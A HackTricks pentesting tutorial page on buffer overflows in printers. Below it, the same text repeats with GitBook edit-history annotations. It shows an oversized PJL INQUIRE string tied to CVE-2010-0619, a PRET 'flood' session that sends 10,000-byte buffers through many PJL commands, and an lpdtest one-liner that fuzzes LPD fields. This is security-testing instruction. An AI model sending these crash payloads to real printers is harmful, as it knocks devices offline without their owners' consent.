hacktricks/pentesting/pentesting-printers/buffer-overflows.md

# Buffer Overflows

## PJL

Various _Lexmark_ laser printers crash when when receiving about 1.000 characters as the INQUIRE argument (see [CVE-2010-0619](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619)) and sending about 3.000 characters as the SET argument to the _Dell 1720n_ crashes the device:

```
@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
```

You can check for Buffer Overflows using [**PRET**](https://github.com/RUB-NDS/PRET):

```bash
./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
```

## LPD daemon

It allows multiple user-defined vectors like _jobname, username or hostname_, which may **not be sufficiently protected. S**everal vulnerabilities related to this malfunction has been already discovered.

A simple **LPD fuzzer** to test for buffer overflows can be created using the `lpdtest` tool **included** in [PRET](https://github.com/RUB-NDS/PRET). The `in` argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):

```bash
./lpdtest.py printer in "`python -c 'print "x"*150'`"
```

**You can find more information about these attacks in** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer\_overflows)****
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# Buffer Overflows`

			`## PJL`

GitBook: [#2873] update 2021-11-30 13:50:20 +00:00			`Various _Lexmark_ laser printers crash when when receiving about 1.000 characters as the INQUIRE argument (see [CVE-2010-0619](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619)) and sending about 3.000 characters as the SET argument to the _Dell 1720n_ crashes the device:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…`
			```

			`You can check for Buffer Overflows using [PRET](https://github.com/RUB-NDS/PRET):`

			```bash
			`./pret.py -q printer pjl`
			`Connection to printer established`

			`Welcome to the pret shell. Type help or ? to list commands.`
			`printer:/> flood`
			`Buffer size: 10000, Sending: @PJL SET [buffer]`
			`Buffer size: 10000, Sending: @PJL [buffer]`
			`Buffer size: 10000, Sending: @PJL COMMENT [buffer]`
			`Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]`
			`Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"`
			`Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"`
			`Buffer size: 10000, Sending: @PJL INFO [buffer]`
			`Buffer size: 10000, Sending: @PJL ECHO [buffer]`
			`Buffer size: 10000, Sending: @PJL INQUIRE [buffer]`
			`Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]`
			`Buffer size: 10000, Sending: @PJL USTATUS [buffer]`
			`Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"`
			`Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"`
			`Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"`
			`Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"`
			`Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"`
			`Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"`
			```

			`## LPD daemon`

GitBook: [#2873] update 2021-11-30 13:50:20 +00:00			`It allows multiple user-defined vectors like _jobname, username or hostname_, which may not be sufficiently protected. Several vulnerabilities related to this malfunction has been already discovered.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2873] update 2021-11-30 13:50:20 +00:00			A simple LPD fuzzer to test for buffer overflows can be created using the `lpdtest` tool included in [PRET](https://github.com/RUB-NDS/PRET). The `in` argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			./lpdtest.py printer in "`python -c 'print "x"*150'`"
			```

GitBook: [#2873] update 2021-11-30 13:50:20 +00:00			`You can find more information about these attacks in [http://hacking-printers.net/wiki/index.php/Buffer\_overflows](http://hacking-printers.net/wiki/index.php/Buffer\_overflows)****`